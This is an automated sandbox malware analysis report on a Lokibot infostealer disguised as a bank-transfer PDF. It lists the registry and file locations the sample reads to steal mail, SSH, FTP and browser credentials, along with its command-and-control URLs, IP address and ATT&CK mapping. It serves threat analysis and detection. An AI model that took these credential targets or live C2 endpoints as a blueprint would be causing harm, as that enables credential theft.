Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 1100, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: transferencia bancaria.pdf.exe PID: 5228, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000001.00000002.513741442.0000000000CF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\transferencia bancaria.pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Source: Yara match	File source: 1.0.transferencia bancaria.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.442b890.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.336cfb4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.transferencia bancaria.pdf.exe.44458b0.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	111 Process Injection	11 Masquerading	2 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Disable or Modify Tools	1 Credentials in Registry	21 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	2 Non-Application Layer Protocol	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	21 Virtualization/Sandbox Evasion	Security Account Manager	1 Remote System Discovery	SMB/Windows Admin Shares	2 Data from Local System	Automated Exfiltration	112 Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	111 Process Injection	NTDS	13 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	11 Obfuscated Files or Information	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	13 Software Packing	Cached Domain Credentials	System Owner/User Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	1 Timestomp	DCSync	Network Sniffing	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
transferencia bancaria.pdf.exe	12%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
transferencia bancaria.pdf.exe	21%	Virustotal		Browse
transferencia bancaria.pdf.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.0.transferencia bancaria.pdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.transferencia bancaria.pdf.exe.44458b0.13.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
0.2.transferencia bancaria.pdf.exe.442b890.12.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
sempersim.su	21%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://kbfvzoboss.bid/alien/fre.php	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://alphastand.win/alien/fre.php	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://alphastand.trade/alien/fre.php	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://sempersim.su/gl21/fre.php	0%	Avira URL Cloud	safe
http://sempersim.su/gl21/fre.php	19%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
sempersim.su	91.142.77.45	true	true	21%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://kbfvzoboss.bid/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: safe URL Reputation: safe	unknown
http://alphastand.win/alien/fre.php	true	URL Reputation: safe	unknown
http://alphastand.trade/alien/fre.php	true	URL Reputation: safe	unknown
http://sempersim.su/gl21/fre.php	true	19%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.ibsensoftware.com/	transferencia bancaria.pdf.exe, 00000000.00000002.277908890.0000000003356000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.290985684.000000000442B000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000000.00000002.291086969.0000000004445000.00000004.00000800.00020000.00000000.sdmp, transferencia bancaria.pdf.exe, 00000001.00000000.275310547.0000000000415000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/cThe	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.jiyu-kobo.co.jp/	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fonts.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.sandoll.co.kr	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	transferencia bancaria.pdf.exe, 00000000.00000002.294758334.00000000073E2000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
91.142.77.45	sempersim.su	Russian Federation		48720	VTSL1-ASRU	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	736955
Start date and time:	2022-11-03 12:28:50 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	transferencia bancaria.pdf.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/3@40/1
EGA Information:	Successful, ratio: 100%
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 22 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:29:57	API Interceptor	38x Sleep call for process: transferencia bancaria.pdf.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
91.142.77.45	KAu0Fx0eB8.exe	Get hash	malicious	Browse	sempersim.su/gl16/fre.php
	a9U6A1R0Eg.exe	Get hash	malicious	Browse	sempersim.su/gk22/fre.php
	JJT-15743SGN DEBIT NTOE FOR 5 CTNS_PDF.exe	Get hash	malicious	Browse	sempersim.su/gk22/fre.php
	transferencia bancaria..exe	Get hash	malicious	Browse	sempersim.su/gl3/fre.php
	DOC_PI20220817.pdf.exe	Get hash	malicious	Browse	sempersim.su/gl2/fre.php
	RFQ0220904Mayr.exe	Get hash	malicious	Browse	sempersim.su/gl20/fre.php
	PI_220800035_SOA_OCT_2022.pdf.exe	Get hash	malicious	Browse	sempersim.su/gl2/fre.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
sempersim.su	KAu0Fx0eB8.exe	Get hash	malicious	Browse	91.142.77.45
	a9U6A1R0Eg.exe	Get hash	malicious	Browse	91.142.77.45
	JJT-15743SGN DEBIT NTOE FOR 5 CTNS_PDF.exe	Get hash	malicious	Browse	91.142.77.45
	transferencia bancaria..exe	Get hash	malicious	Browse	91.142.77.45
	DOC_PI20220817.pdf.exe	Get hash	malicious	Browse	91.142.77.45
	RFQ0220904Mayr.exe	Get hash	malicious	Browse	91.142.77.45
	PI_220800035_SOA_OCT_2022.pdf.exe	Get hash	malicious	Browse	91.142.77.45
	Statement of Account.pdf.exe	Get hash	malicious	Browse	87.251.79.65
	file.exe	Get hash	malicious	Browse	87.251.79.195
	SecuriteInfo.com.Win32.PWSX-gen.726.17024.exe	Get hash	malicious	Browse	87.251.79.195
	LHNz9uEDyrigqri.exe	Get hash	malicious	Browse	193.233.204.84
	RbvMuEnOJj.exe	Get hash	malicious	Browse	193.233.204.84
	E9WYnPSSnp.exe	Get hash	malicious	Browse	193.233.204.84
	ziiuewirisdfjhfjh.doc	Get hash	malicious	Browse	193.233.204.84
	zziiuewirisdfjhfjh.doc	Get hash	malicious	Browse	193.233.204.84
	vbc.exe	Get hash	malicious	Browse	193.233.204.84
	dS8nI2FGb6.exe	Get hash	malicious	Browse	193.233.204.84
	BPpOypeeME.exe	Get hash	malicious	Browse	193.233.204.84
	GFCmQMox5MpE7RD.exe	Get hash	malicious	Browse	193.233.204.84
	13-10-2022_______________Remittance copy.exe	Get hash	malicious	Browse	193.233.204.84

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
VTSL1-ASRU	KAu0Fx0eB8.exe	Get hash	malicious	Browse	91.142.77.45
	a9U6A1R0Eg.exe	Get hash	malicious	Browse	91.142.77.45
	JJT-15743SGN DEBIT NTOE FOR 5 CTNS_PDF.exe	Get hash	malicious	Browse	91.142.77.45
	transferencia bancaria..exe	Get hash	malicious	Browse	91.142.77.45
	DOC_PI20220817.pdf.exe	Get hash	malicious	Browse	91.142.77.45
	RFQ0220904Mayr.exe	Get hash	malicious	Browse	91.142.77.45
	PI_220800035_SOA_OCT_2022.pdf.exe	Get hash	malicious	Browse	91.142.77.45
	file.exe	Get hash	malicious	Browse	91.142.79.192
	mistershut,file,08.06.22.doc	Get hash	malicious	Browse	91.142.79.204
	masia.file.08.06.doc	Get hash	malicious	Browse	91.142.79.204
	ireplace-file-08.06.22.doc	Get hash	malicious	Browse	91.142.79.204
	pastagentile,file,08.06.22.doc	Get hash	malicious	Browse	91.142.79.204
	SMIEC_MARCH_SOA_SHIPMENT_TT_SLIP_pdf.exe	Get hash	malicious	Browse	91.142.79.80
	SMIEC_MARCH_SOA_SHIPMENT_TT_SLIP_pdf.exe	Get hash	malicious	Browse	91.142.79.80
	MV NORDPUMA.xlsx	Get hash	malicious	Browse	91.142.79.80
	iwMxkCxA73.exe	Get hash	malicious	Browse	91.142.79.80
	8pJFGILBYe.exe	Get hash	malicious	Browse	91.142.78.221
	uOItzWogCB.exe	Get hash	malicious	Browse	91.142.78.221
	flstudio_win_20.8.2.1863.exe	Get hash	malicious	Browse	91.142.78.221
	5502146fcab8739ffd8de25a8ae6656058ec0da0a5f12.exe	Get hash	malicious	Browse	91.142.78.221

Process:	C:\Users\user\Desktop\transferencia bancaria.pdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
MD5:	FED34146BF2F2FA59DCF8702FCC8232E
SHA1:	B03BFEA175989D989850CF06FE5E7BBF56EAA00A
